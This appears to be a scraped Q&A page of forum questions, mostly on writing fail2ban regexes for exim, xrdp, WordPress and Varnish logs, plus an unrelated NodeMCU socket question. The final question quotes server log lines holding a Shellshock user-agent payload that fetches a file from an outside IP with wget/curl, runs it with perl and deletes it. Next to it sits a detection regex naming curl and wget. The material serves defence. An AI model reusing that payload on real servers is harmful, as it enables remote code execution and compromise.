I am trying to create a regex condition for the exim filter of Fail2Ban. In my exim log, I have entries like this:
2014-11-27 17:09:05 SMTP connection from [42.117.255.244] (TCP/IP connection count = 1)
2014-11-27 17:09:14 SMTP connection from [118.68.249.18] (TCP/IP connection count = 2)
2014-11-27 17:09:15 SMTP connection from [113.188.85.220] (TCP/IP connection count = 3)
So I need a regex filter which analyzes the exim log, and if TCP/IP connection count > 3, then fail2ban will block that ip for the amount of time specified in fail2ban configuration.
What I have tried so far is something like this:
failregex = ^%(pid)s SMTP connection from \S+ [](:\d+)? (I=[\S+]:\d+ )?(TCP/IP connection count = "\S+")\s*$
but it fails ... I am not any good at regex so I need your help.
Thank you!
[ \S]+?SMTP connection from \S+? \(TCP\/IP connection count = (?!\b1\b|\b2\b|\b3\b)\d+\)
Try this.See demo.
http://regex101.com/r/hQ9xT1/10
Related
in order to configure fail2ban for xrdp attacks, i need some help with regexp.
In /var/log/xrdp.log i can see :
[20201229-12:24:42] [INFO ] Socket 12: AF_INET6 connection received from ::ffff:82.74.118.114 port 55267
So in jail.conf i add :
[rdp]
enabled = true
filter = rdp
action = iptables-multiport[name=rdp, port="3389,3390,3391", protocol=tcp]
logpath = /var/log/xrdp.log
maxretry = 5
And for the filter.d/rdp.conf i wrote :
[Definition]
failregex = connection received from ::ffff:<HOST> port
ignoreregex =
Obviously my regexp is bad...
Can someone help me ?
Thx
Your failregex is redundant because <HOST> is an alias for the pattern (?:::f{4,6}:)?(?P<host>\S+), which includes the ::ffff: part. Also the date format in your log isn't supported by the default date templates of fail2ban, so you must set a custom date pattern.
[Definition]
failregex = connection received from <HOST>
ignoreregex =
datepattern = %%Y%%m%%d-%%H:%%M:%%S
As a rule of thumb you should always test your date patterns and regex with the fail2ban-regex tool.
I wanted to test fail2ban but I'm hitting a problem. My trys with regex does not really works.
The username e.g. userxy which occurs in the the first line of the log and in the second line the IP Address must be blocked by fail2ban.
/etc/fail2ban/jail.conf
[Filter1]
enabled = true
filter = test
port = 12345
protocol = tcp
logpath = /var/etc/logs/auth.log
banaction = iptables-multiport
findtime = 1800
bantime = 3600
/var/etc/logs/auth.log
2018/09/21 20:45:13 ASDFDGFS c (trail) password for 'userxy' invalid!
2018/09/21 20:45:13 ASDFDGFS c (client) anonymous disconnected from 192.168.252.37
/etc/fail2ban/filter.d/test.conf
[Init]
maxlines = 2
[Definition]
failregex = ^.*userxy*\n.*anonymous disconnected from <HOST>.*$
ignoreregex =
I was trying to connect a NodeMCU Socket client program to a Python server program, but I was not able to establish a connection.
I tested a simple Python client server code and it worked well.
Python Server Code
import socket # Import socket module
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 12345 # Reserve a port for your service.
s.bind((host, port)) # Bind to the port
s.listen(5) # Now wait for client connection.
while True:
c, addr = s.accept() # Establish connection with client.
print 'Got connection from', addr
print c.recv(1024)
c.send('Thank you for connecting')
c.close() # Close the connection
Python client code (with this I tested the above code)
import socket # Import socket module
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 12345 # Reserve a port for your service.
s.connect((host, port))
s.send('Hi i am aslam')
print s.recv(1024)
s.close # Close the socket when done
The output server side was
Got connection from ('192.168.99.1', 65385)
Hi i am aslam
NodeMCU code
--set wifi as station
print("Setting up WIFI...")
wifi.setmode(wifi.STATION)
--modify according your wireless router settings
wifi.sta.config("xxx", "xxx")
wifi.sta.connect()
function postThingSpeak()
print("hi")
srv = net.createConnection(net.TCP, 0)
srv:on("receive", function(sck, c) print(c) end)
srv:connect(12345, "192.168.0.104")
srv:on("connection", function(sck, c)
print("Wait for connection before sending.")
sck:send("hi how r u")
end)
end
tmr.alarm(1, 1000, 1, function()
if wifi.sta.getip() == nil then
print("Waiting for IP address...")
else
tmr.stop(1)
print("WiFi connection established, IP address: " .. wifi.sta.getip())
print("You have 3 seconds to abort")
print("Waiting...")
tmr.alarm(0, 3000, 0, postThingSpeak)
end
end)
But when I run the NodeMCU there is no response in the Python server.
The Output in the ESPlorer console looks like
Waiting for IP address...
Waiting for IP address...
Waiting for IP address...
Waiting for IP address...
Waiting for IP address...
Waiting for IP address...
WiFi connection established, IP address: 192.168.0.103
You have 3 seconds to abort
Waiting...
hi
Am I doing something wrong or missing some steps here?
Your guidance is appreciated.
After I revisited this for the second time it finally clicked. I must have scanned your Lua code too quickly the first time.
You need to set up all event handlers (srv:on) before you establish the connection. They may not fire otherwise - depending on how quickly the connection is established.
srv = net.createConnection(net.TCP, 0)
srv:on("receive", function(sck, c) print(c) end)
srv:on("connection", function(sck)
print("Wait for connection before sending.")
sck:send("hi how r u")
end)
srv:connect(12345,"192.168.0.104")
The example in our API documentation is wrong but it's already fixed in the dev branch.
i have added rule into fail2ban to reject all wp login attemps
failregex = ^[a-zA-Z0-9\.]+ <HOST> .*POST.*/wp-login\.php HTTP.*
i would like to add the parameter GET to all login attempt (for reject them also )
so far i tried this
failregex = ^[a-zA-Z0-9\.]+ <HOST> .*"(GET|POST).*/wp-login\.php HTTP.*
or
failregex = ^[a-zA-Z0-9\.]+ <HOST> .*(GET|POST).*/wp-login\.php HTTP.*
but this does not work for GET parameter i still see it in access.log
thx you very much to help me
Currently have a server with 2 IPs, one internal and one external with varnish on the external and an apache backend on the internal with fail2ban running pretty much as default.
Recently the website went down returning 503 errors and it turned out fail2ban had banned the varnish from talking to the apache backend vi the apache-noscript rule. I have since added an exclusion for the ip address so this will not get banned again, but ideally I would prefer it if the client was banned in future.
From the apache logs
SERVER_IP - - [14/Jan/2015:16:52:57 +0000] "GET /phppath/php HTTP/1.1" 404 438 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS! #";system(\"wget http://69.64.75.181/img.bin -O /tmp/s.pl;curl -O /tmp/s.pl http://69.64.75.181/img.bin;perl /tmp/s.pl;rm -rf s.pl*\");'"
From the varnish logs
CLIENT_IP - - [14/Jan/2015:16:52:57 +0000] "GET http://SERVER_IP/phppath/php HTTP/1.1" 404 226 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://69.64.75.181/img.bin -O /tmp/s.pl;curl -O /tmp/s.pl http://69.64.75.181/img.bin;perl /tmp/s.pl;rm -rf s.pl*");'"
Would it be okay to just replicate my apache-noscript defnition to use the varnishlogs, i.e.:
[apache-noscript]
enabled = true
port = http,https
filter = apache-noscript
logpath = /var/log/apache*/*error.log
maxretry = 2
to become
[varnish-noscript]
enabled = true
port = http,https
filter = apache-noscript
logpath = /var/log/varnish/varnishncsa.log
maxretry = 2
I have noticed the apache no script filter has has the following failregex
failregex = ^%(_apache_error_client)s (File does not exist|script not found or unable to stat): /\S*(\.php|\.asp|\.exe|\.pl)\s*$
^%(_apache_error_client)s script '/\S*(\.php|\.asp|\.exe|\.pl)\S*' not found or unable to stat\s*$
I guess the main question is will this still work for the varnishlog in the output above, if not what failregex would I need?
Many Thanks.
[EDIT] It turns out as a coincidence the noscript did the banning but not for the above log entries. Now to formulate a fail2ban regex for the above log entry.
Okay I've created a new jail with the following rule to catch the above:
failregex = ^<HOST>.*\[[^]]+\].*\".+\"\s[1-9][0-9][0-9]\s[0-9]+\s\".*\"\s\".*(\/tmp|\/usr\/bin|curl\s+|\s*wget\s+|\.bin\s+).*\"$
Please feel free to suggest improvements to the rule to catch the log line mentioned above.
The fail regex works on both the apache access log and the varnish csa log.